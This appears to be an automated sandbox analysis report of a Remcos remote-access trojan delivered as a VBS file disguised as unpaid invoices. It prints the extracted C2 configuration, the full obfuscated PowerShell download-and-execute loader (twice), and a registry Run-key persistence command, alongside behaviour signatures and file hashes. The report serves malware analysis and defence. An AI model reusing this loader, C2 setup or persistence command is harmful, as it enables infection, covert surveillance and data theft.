Analysis

  • max time kernel
    240s
  • max time network
    245s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    21/10/2024, 16:33

General

  • Target
    IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs
  • Size
    28KB
  • MD5
    a8da570deac5f16a0050802c0da5d7dd
  • SHA1
    9d8992e3770e41d8a431350e1cef73492dc240ea
  • SHA256
    c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d
  • SHA512
    7731d4d019eb8e3cfa5e2e5d5802e4033cf289134c15c3a237bcfd7559ab964265b82b825b65451a21703f441619081b9be46767923fb7f662aa12a86e997730
  • SSDEEP
    384:XrCiU16HKM4O+pbHLipRBP1Mv4Uwz+3S0KLV5Zsk+PNngq:Xen6HspbH2xdoftaV5Ck4N7

Malware Config

Extracted

  • Family
    remcos
  • Botnet
    MISS Chy
  • C2
    pelele.duckdns.org:51525

Attributes

  • audio_folder
    MicRecords
  • audio_record_time
    5
  • connect_delay
    0
  • connect_interval
    1
  • copy_file
    remcos.exe
  • copy_folder
    Remcos
  • delete_file
    false
  • hide_file
    false
  • hide_keylog_file
    false
  • install_flag
    false
  • keylog_crypt
    false
  • keylog_file
    logs.dat
  • keylog_flag
    false
  • keylog_folder
    remcos
  • mouse_option
    false
  • mutex
    Rmc-TXCR8B
  • screenshot_crypt
    false
  • screenshot_flag
    false
  • screenshot_folder
    Screenshots
  • screenshot_path
    %AppData%
  • screenshot_time
    10
  • take_screenshot_option
    false
  • take_screenshot_time
    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IMGRO Facturi neplătite 56773567583658567835244234Bandido.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\System32\ping.exe
      ping gormezl_6777.6777.6777.677e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:3004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr 
Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. 
rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs 
Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2784
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr 
Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. 
rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci (,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor (pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor (pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf % Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor (pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik- SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor (pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs 
Th,eUnre6 ,xp4Pr,vS RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1832
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1208

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    • Filesize
      342B
    • MD5
      74976045a25926655a8976d0ab59a648
    • SHA1
      6471236ed9ed2cce34b3019d0a5a94c182112d1b
    • SHA256
      df9c1bad68298244da4b6bdcbd7320f39f9d7d790a43438ab72fb9dd61dae5b1
    • SHA512
      7913961f70057da12788dfdc10f22fa3b6fc6a97acaf71e755e86214c0e30007b7039945e6bdc231905d100e8d74170bfcfbdb866dc2a38a8e105523f1cae311
  • C:\Users\Admin\AppData\Local\Temp\CabB849.tmp
    • Filesize
      70KB
    • MD5
      49aebf8cbd62d92ac215b2923fb1b9f5
    • SHA1
      1723be06719828dda65ad804298d0431f6aff976
    • SHA256
      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
    • SHA512
      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
  • C:\Users\Admin\AppData\Local\Temp\TarA4D8.tmp
    • Filesize
      181KB
    • MD5
      4ea6026cf93ec6338144661bf1202cd1
    • SHA1
      a1dec9044f750ad887935a01430bf49322fbdcb7
    • SHA256
      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
    • SHA512
      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
  • C:\Users\Admin\AppData\Roaming\Clothesman.Vin
    • Filesize
      475KB
    • MD5
      87ff833a255506114faa969869e18546
    • SHA1
      86316d90af91a20bffd5a586e7ae94befe65651d
    • SHA256
      47a1ffa66a690b0adcf95f5a2141629e112ede25f80dda1adeb4f846f2d14beb
    • SHA512
      6c484170c56d52f1f1786c8eb18ccbebb138c8a1f90b57c509c1e7d5a9fcf1bccecd4e0754df6836d9602651094c02c3c58d3c3d0d72b25451952a1dc8091509
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8NOWPAAVYIZEUIUUO0QH.temp
    • Filesize
      7KB
    • MD5
      759d61910ceabdcccabf742ee946ed56
    • SHA1
      029b8b74a9e751440f7c98570b80fb20772b343f
    • SHA256
      ed8b1ea20d3c9cba45f372a3e7500deaf2166cd9876f7a114ced4b8b44303ac0
    • SHA512
      abc74ccfe5c7098f1528406cbd36dc932f22946dd103f75b54f97d21a1fe9acf18d247cdb90bd0890487c95cd5b79c7dd194b71f4695dfe4ec7438244be5f467
  • memory/2040-53-0x0000000000460000-0x00000000014C2000-memory.dmp
    • Filesize
      16.4MB
  • memory/2040-51-0x0000000000460000-0x00000000014C2000-memory.dmp
    • Filesize
      16.4MB
  • memory/2596-33-0x0000000006240000-0x0000000009A20000-memory.dmp
    • Filesize
      55.9MB
  • memory/2784-23-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp
    • Filesize
      9.6MB
  • memory/2784-29-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp
    • Filesize
      9.6MB
  • memory/2784-26-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp
    • Filesize
      9.6MB
  • memory/2784-25-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp
    • Filesize
      9.6MB
  • memory/2784-24-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp
    • Filesize
      9.6MB
  • memory/2784-22-0x0000000001F40000-0x0000000001F48000-memory.dmp
    • Filesize
      32KB
  • memory/2784-21-0x000000001B2E0000-0x000000001B5C2000-memory.dmp
    • Filesize
      2.9MB
  • memory/2784-20-0x000007FEF4ACE000-0x000007FEF4ACF000-memory.dmp
    • Filesize
      4KB